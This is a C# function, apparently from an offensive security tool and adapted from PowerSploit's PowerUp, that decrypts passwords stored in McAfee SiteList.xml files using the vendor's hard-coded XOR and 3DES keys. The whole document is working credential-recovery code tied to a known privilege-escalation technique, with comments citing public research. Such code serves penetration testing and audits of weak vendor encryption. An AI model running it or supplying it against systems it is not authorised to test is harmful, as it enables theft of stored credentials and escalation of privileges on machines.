public static string DecryptSiteListPassword(string b64password)
{
// Adapted from PowerUp: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1#L4128-L4326
// References:
// https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
// https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/
// https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
// https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf
// static McAfee key XOR key LOL
byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };
// xor the input b64 string with the static XOR key
var passwordBytes = System.Convert.FromBase64String(b64password);
for (var i = 0; i < passwordBytes.Length; i++)
{
passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]);
}
SHA1 crypto = new SHA1CryptoServiceProvider();
// build the static McAfee 3DES key TROLOL
var tDESKey = MiscUtil.Combine(crypto.ComputeHash(System.Text.Encoding.ASCII.GetBytes("<!@#$%^>")), new byte[] { 0x00, 0x00, 0x00, 0x00 });
// set the options we need
var tDESalg = new TripleDESCryptoServiceProvider();
tDESalg.Mode = CipherMode.ECB;
tDESalg.Padding = PaddingMode.None;
tDESalg.Key = tDESKey;
// decrypt the unXor'ed block
var decrypted = tDESalg.CreateDecryptor().TransformFinalBlock(passwordBytes, 0, passwordBytes.Length);
var end = Array.IndexOf(decrypted, (byte)0x00);
// return the final password string
var password = System.Text.Encoding.ASCII.GetString(decrypted, 0, end);
return(password);
}
